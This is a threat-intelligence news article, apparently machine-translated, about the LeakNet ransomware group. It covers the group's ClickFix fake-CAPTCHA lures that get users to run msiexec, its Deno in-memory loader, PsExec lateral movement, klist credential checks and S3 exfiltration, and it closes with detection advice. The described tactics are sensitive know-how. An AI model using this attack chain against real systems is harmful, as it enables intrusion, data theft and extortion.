LeakNet redefines Ransomware with ClickFix: Social Engineering, Deno and Memory Execution

In recent months we have seen certain bands of ransomware evolve from known tactics to more subtle methods and oriented to social engineering. One of the most striking examples comes from LeakNet, an operation that appeared in late 2024 and is now changing its way of accessing networks: instead of relying so much on stolen accounts purchased in the black market, it relies on tricks that induce the victim to execute commands by her own hand.

The star mechanism that LeakNet has implemented is known as ClickFix. In essence, attackers compromise legitimate sites and use them to show false controls - for example, CAPTCHA-type verifications - that persuade the user to copy and paste a command into the Run Windows box. That command usually invoke msiexec.exe to launch an apparently harmless installer, but it actually triggers a malware load chain. The attraction of the trick is double: confidence in legitimate pages is exploited and much of the network signals that would detect traffic from their own malicious infrastructures are avoided. ReliaQuest documents this change and its analysis is a recommended reading for those who want to deepen the technique ( ReliaQuest report).

Another key piece of the technology puzzle is the inclusion of a loader based on Deno, the modern run for JavaScript and TypeScript. Instead of leaving visible files on disk, this loader runs code encoded on Base64 directly in memory, contacts external servers to download later stages and enters a survey cycle that allows to bring new instructions without leaving too much persistent evidence. To understand Deno and why attackers use it as a "runtime of their own," the official site offers documentation and technical details ( deno.land).

This approach fits a broader strategy: by dispensing with intermediaries selling initial access, LeakNet reduces costs per victim and increases its scale capacity. In addition, because delivery is made from reliable but committed sites, defenses that rely on the reputation of traditional domains or network patterns have less room to identify intrusion on time. WatchGuard and other trackers have already had records of LeakNet since its appearance in November 2024 ( profile in WatchGuard).

When the actor manages to run its code, the post- operation chain that describes ReliaQuest tends to repeat itself: the loader starts a malicious DLL by means of DLL ide-loading, legitimate tools such as PsExec to move laterally over the network, active credentials and tickets are sought with commands like klist to accelerate access to existing services, and finally filtered data and encrypted systems. Microsoft offers information about PsExec and its legitimate use that can help contextualize why this tool is attractive to attackers ( PsExec documentation), and Microsoft itself documents the klist command used to inspect credentials ( klist in Microsoft documentation).

The exfiltrate also receives particular attention: instead of using clearly malicious channels, LeakNet has been observed using S3 buckets to store stolen data, taking advantage that traffic to cloud services often seems legitimate and thus go unnoticed. The best registration and monitoring practices in Amazon S3 are therefore an important defensive factor ( guide to Amazon S3).

Not all the intrusions that the intelligence centers speak of follow exactly the same ClickFix script: ReliaQuest also recorded attempts in which the attackers used phishing via Microsoft Teams to fool employees and get them to run a chain of charges that ended up, again, on a Deno-based loader. This variety suggests two possibilities: either LeakNet deliberately expanded its input vector repertoire, or the BYOR technique - "bringing your own runtime," bringing your own runtime - is being adopted by other groups. Regardless of the authorship, the result points to more general observations of the Ransomware panorama: according to Google Threat Intelligence Group, vulnerability holdings in VPNs and firewalls remain a frequent cause of initial access, and data theft in Ransomware incidents is increasing ( Google report).

For those who defend networks, the good news is that this set of tactics is not completely undetectable: the LeakNet operation exhibits a relatively constant post-commitment sequence, which opens concrete windows for detection and response before mass encryption occurs. Monitoring unusual processes that launch msiexec.exe from web contexts, identifying Deno instances running suspicious, monitoring side movements with PsExec and looking for anomalous accesses or ups to S3 buckets are measures that can make a difference. In addition, user education - so that it does not stick commands that indicate web pages even if they seem verified - remains a critical defense line.

On a broader plane, the ecosystem of the ransomware shows contrasting tensions: on the one hand, the resilience of operations and their continuous adaptation; on the other, signs that the aggregate profitability of the rescue business may be decreasing, which pushes some actors to change targets or tactics to maximize volume or efficiency. Recent market analysis and incident response discuss these dynamics and their effects on extortion trends ( Coveware analysis).

If there is a practical conclusion, it is that the defenses need to adapt to the mixture of sophisticated social engineering and legitimate tools reused for hostile purposes. LeakNet's shift to ClickFix and Deno's memory execution is a reminder that security is both technical and human: strengthening configurations, applying patches in exposed infrastructure, segmenting networks, auditioning and alerting about abnormal behavior in runtimes and cloud services, and keeping people informed about deception tactics should be a priority. For those who want to look at more technical details and evidence of attacks, the ReliaQuest and Drago reports offer maps and examples that help to understand the threat in depth ( Drago analysis).